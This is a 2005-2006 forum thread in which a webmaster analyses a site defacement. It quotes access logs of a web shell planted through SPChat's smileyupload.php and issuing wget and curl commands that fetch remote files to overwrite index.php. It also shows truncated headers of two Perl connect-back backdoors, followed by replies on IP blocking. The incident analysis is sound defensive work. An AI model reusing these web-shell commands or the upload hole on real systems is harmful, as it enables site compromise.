Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
ring_c
Involved
Involved


Joined: Dec 28, 2003
Posts: 276
Location: Israel

PostPosted: Thu Sep 29, 2005 8:16 am Reply with quote

Ok, this time they've realy made me angry! somone has reset my index.php. no other harm, just left me with a 0 bytes file!

Grrrrrrr... that realy got to me.
Ok, I've started investigating. Using Sentinel's (thanks guys, you're great!) tracked IP, I've found the hacker's ip, matching it to the time the file was last changed.

This is a Brasilian team. the IP was 200.232.181.49.

Ok. now I had to go through a 670mb raw log file, to find out what they've done! Geee... 670mb???

First of all, I went on a search for an editor which can handle this kind of size. have found one called Programmer's File Editor from 1999 (if you have a more recent one, tell me, though this one handle it pretty well).

Ok now... here's the log file, with all entries of this ip address (including another Brasilian IP i've found in the same time, just in case) :

Code:
200.232.181.49 - - [28/Sep/2005:21:19:22 -0400] "GET /modules/drk.php HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.232.181.49 - - [28/Sep/2005:21:19:32 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:33 -0400] "GET /modules/inc.php HTTP/1.1" 200 2481 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:39 -0400] "GET /modules/inc.php HTTP/1.1" 200 4290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:46 -0400] "POST /modules/inc.php HTTP/1.1" 200 5411 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:15 -0400] "POST /modules/inc.php HTTP/1.1" 200 4526 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET / HTTP/1.1" 200 16172 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 200 3184 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 200 6527 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 200 641 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 200 27299 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 200 99 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 200 817 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 200 49 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 200 828 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 200 101 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/calender.jpg HTTP/1.1" 200 482 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/rss.gif HTTP/1.1" 200 728 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 200 7639 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_r.gif HTTP/1.1" 200 191 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 200 193 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/group.gif HTTP/1.1" 200 989 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/guest.gif HTTP/1.1" 200 889 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/spacer.gif HTTP/1.1" 200 89 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/space.gif HTTP/1.1" 200 91 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/userprofil.gif HTTP/1.1" 200 891 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/member.gif HTTP/1.1" 200 887 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/admin.gif HTTP/1.1" 200 886 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/gold.gif HTTP/1.1" 200 894 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/dati.gif HTTP/1.1" 200 3533 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/hagigim.gif HTTP/1.1" 200 3713 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:37 -0400] "GET /modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php HTTP/1.1" 200 1786 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:43 -0400] "POST /modules/inc.php HTTP/1.1" 200 1349 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:47 -0400] "POST /modules/inc.php HTTP/1.1" 200 151780 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1458 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:57 -0400] "POST /modules/inc.php HTTP/1.1" 200 1400 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 1419 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:20 -0400] "POST /modules/inc.php HTTP/1.1" 200 1503 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:24 -0400] "POST /modules/inc.php HTTP/1.1" 200 152709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:26 -0400] "POST /modules/inc.php HTTP/1.1" 200 1386 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:48 -0400] "POST /modules/inc.php HTTP/1.1" 200 4621 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:53 -0400] "POST /modules/inc.php HTTP/1.1" 200 4677 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:23 -0400] "GET / HTTP/1.1" 200 15983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/calender.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/rss.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4567 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:45 -0400] "GET / HTTP/1.1" 200 30 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:25 -0400] "POST /modules/inc.php HTTP/1.1" 200 4755 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:29 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:26:10 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4699 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:41 -0400] "POST /modules/inc.php HTTP/1.1" 200 4734 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:52 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:55 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:56 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:06 -0400] "POST /modules/inc.php HTTP/1.1" 200 4741 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:14 -0400] "POST /modules/inc.php HTTP/1.1" 200 4626 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:18 -0400] "POST /modules/inc.php HTTP/1.1" 200 4633 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:23 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:21:31:56 -0400] "GET /modules/inc.php HTTP/1.1" 200 4304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:31:57 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 4555 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:04 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "POST /modules/inc.php HTTP/1.1" 200 4940 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:12 -0400] "POST /modules/inc.php HTTP/1.1" 200 4838 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:13 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "GET /modules/inc.php HTTP/1.1" 200 4199 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:46 -0400] "GET /modules/inc.php HTTP/1.1" 200 4192 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:48 -0400] "GET /modules/inc.php?work_dir=/&command= HTTP/1.1" 200 1709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1861 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:58 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:10 -0400] "POST /modules/inc.php HTTP/1.1" 200 1857 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:18 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1892 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:21 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1850 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:23:04:15 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:23:04:18 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"


You can see they've used some backdoor in SPChat, which let you UL files. The filename is smileyupload.php, and it can be found in \modules\SPChat\

Also, I've found to .txt files in my root ULed today, which looks like perl hacking script.

Here's the one called dc.txt:
Code:
#!/usr/bin/perl

use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";

print "[*] Datached\n\n";


And here's the one called own.txt:
Code:
#!/usr/bin/perl

# Telnet-like Standard Daemon 0.7
#
#    0ldW0lf - Only registered users can see links on this board! Get registered or login!
#            - Only registered users can see links on this board! Get registered or login!
#            - Only registered users can see links on this board! Get registered or login!
#            - Only registered users can see links on this board! Get registered or login!
#
#  For those guys that still like to open ports
#  and use non-rooted boxes
#
#  This has been developed to join in the TocToc
#  project code, now it's done and I'm distributing
#  this separated
#
#  This one i made without IO::Pty so it uses
#  only standard modules... enjoy it
#
#  tested on linux boxes.. probably will work fine on others
#  any problem... #atrix@irc.brasnet.org
#


Now, first I think it should be recommended to remove SPChat's smileyupload.php file. Then, regarding the other files and log -> it's beyond my capabilities. Maybe you guys can figure something out of this.

FYI.


Edited by Raven for security reasons
 
View user's profile Send private message Visit poster's website
hitwalker
Sells PC To Pay For Divorce


Joined:
Posts: 5661

PostPosted: Thu Sep 29, 2005 8:40 am Reply with quote

nice such a fat log..
anyway....
spchat does have a few vulnerabilities.
Only registered users can see links on this board! Get registered or login!

And that was a simple search..
You shouldnt leave any "upload capable" files on your server..
However i do have doubts they did this..
Cause you do must have some rights or access to do any damage..
And using search like "vulnerabilities SPChat" gives 1800 results in that.
Nice chat.. Sad
 
View user's profile Send private message
ring_c
PostPosted: Thu Sep 29, 2005 8:49 am Reply with quote

Gees... would you suggest completely removing SPChat?
 
hitwalker
PostPosted: Thu Sep 29, 2005 2:15 pm Reply with quote

well lets not debate if spchat is vulnerable or not.
you do believe someone abused spchat.
there are other chat scripts out there you can use.
 
Raven
Site Admin/Owner


Joined: Aug 27, 2002
Posts: 17086

PostPosted: Thu Sep 29, 2005 3:49 pm Reply with quote

deny from 200.0.0.0/10

That will deny from 200.0.0.0 - 200.63.255.255

I receive over 3 million bytes per day from that IP range that drops into the bit-bucket. Of course I drop it at the kernel level so it never goes anywhere - it doesn't affect the web server that way ROTFL

If you have access to your root access on your server and use APF, just use this command
Code:
/PATH/TO/APF/apf -d 200.0.0.0/10 #brazil kiddies


If you don't use APF but have IPTABLES installed, use
Code:
iptables -I INPUT -s 200.0.0.0/10  -j DROP
 
View user's profile Send private message
ring_c
PostPosted: Sat Oct 01, 2005 12:39 pm Reply with quote

Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somewhy by sentinel, and I don't want to be rebanned, so i'll have to trust my instincts.
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Sat Oct 01, 2005 1:00 pm Reply with quote

Wink I have also tried to post my htaccess some days before.

Your instinct is probably better then mine with other words prevention is better than cure. But deny is easy its only one line.
 
View user's profile Send private message
Raven
PostPosted: Sat Oct 01, 2005 1:05 pm Reply with quote

ring_c wrote:
Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somewhy by sentinel, and I don't want to be rebanned, so i'll have to trust my instincts.
That will handle it.
 
ring_c
PostPosted: Sat Oct 01, 2005 1:36 pm Reply with quote

Raven, that's a part of my .htaccess:

<Limit GET PUT POST>
Order Allow,Deny
deny from 200.0.0.0/10
Allow from all
</Limit>

is that ok?
 
Susann
PostPosted: Sat Oct 01, 2005 1:45 pm Reply with quote

Your htaccess is OK For example thats my part of this.

<Limit GET PUT POST>
Order Allow,Deny
Deny from 217.67.244.02
Deny from 211.157.8.41
Allow from all
</Limit>

Btw. Have you ever heard of grep. Its a tool for logfiles analyze.I got this tip from my other forum. Maybe its interesting for you too. But I have not checked it.
 
ring_c
PostPosted: Sat Oct 01, 2005 1:56 pm Reply with quote

I've just googled it and found it to be some unix/linux tool.
Will it handle large log files like mine (over 500mb)?

Also, the reason my logfile is so long, is that I have Site Messenger, which refreshes itself for new messages every 2000ms or so. is there a way to make it not being recorded?
 
Raven
PostPosted: Sat Oct 01, 2005 1:57 pm Reply with quote

grep is standard unix from way back. You have to be logged into your server via ssh to use it.
 
JediAaron
New Member
New Member


Joined: Apr 12, 2006
Posts: 11

PostPosted: Tue Jul 11, 2006 8:09 am Reply with quote

This is an old thread - but I'm wondering if this still an issue with the latest SPChat, and is there anything in RavenPHP (Nuke Sentinel) I need or should do?

Thanks

_________________
- Dravin Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Send e-mail Visit poster's website AIM Address
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Tue Jul 11, 2006 9:47 am Reply with quote

I thought everyone was aware of the SPChat problem Embarassed
Perhaps it is time for an authoritative list of known vulnerable modules and othe add-ons/hacks?
 
View user's profile Send private message Send e-mail
JediAaron
PostPosted: Tue Jul 11, 2006 9:59 am Reply with quote

Well I knew it had issues, what doesn't these days (other than Raven? :p).

The people at the site wanted to chit-chat, its the best program I could find. But I was wondering, what the best steps are the protect myself. I see Raven posted a reply above - didn't know if there was something via Sentinel I could do.

Smile
 
Guardian2003
PostPosted: Tue Jul 11, 2006 10:02 am Reply with quote

As Raven posted, you could add the following range to Nuke Sentinels blocked ranges
200.0.0.0 to 200.63.255.255
But you can always use htaccess which will prevent them even reaching the site.


Last edited by Guardian2003 on Tue Jul 11, 2006 10:07 am; edited 1 time in total 
JediAaron
PostPosted: Tue Jul 11, 2006 10:05 am Reply with quote

Guardian2003 wrote:
As Raven posted, you could add the folling range to Nuke Sentinels blocked ranges
200.0.0.0 to 200.63.255.255


Thank you kind sir. Just wanted to double check Smile

It is done. Surprised
 
Gremmie
Former Moderator in Good Standing


Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA

PostPosted: Tue Jul 11, 2006 12:07 pm Reply with quote

JediAaron wrote:
The people at the site wanted to chit-chat, its the best program I could find.


Did you look at Only registered users can see links on this board! Get registered or login!?
 
View user's profile Send private message
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9453
Location: Arizona

PostPosted: Wed Jul 12, 2006 6:31 am Reply with quote

JediAaron, but please understand that if SPChat is vulnerable, banning IP addresses does not solve the problem, only eliminates the few folks who were doing the backing earlier from accessing your site.

Just did not want you to feel overly confident and get hacked. Nuke, or any other system, is only as good as its "weakest link".

Unfortunately, I cannot comment on chat programs as I do not have time to review them for security holes and I'd probably miss them anyways. Just saying this to "be careful" and make a truelly educated, well-considered decision.

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©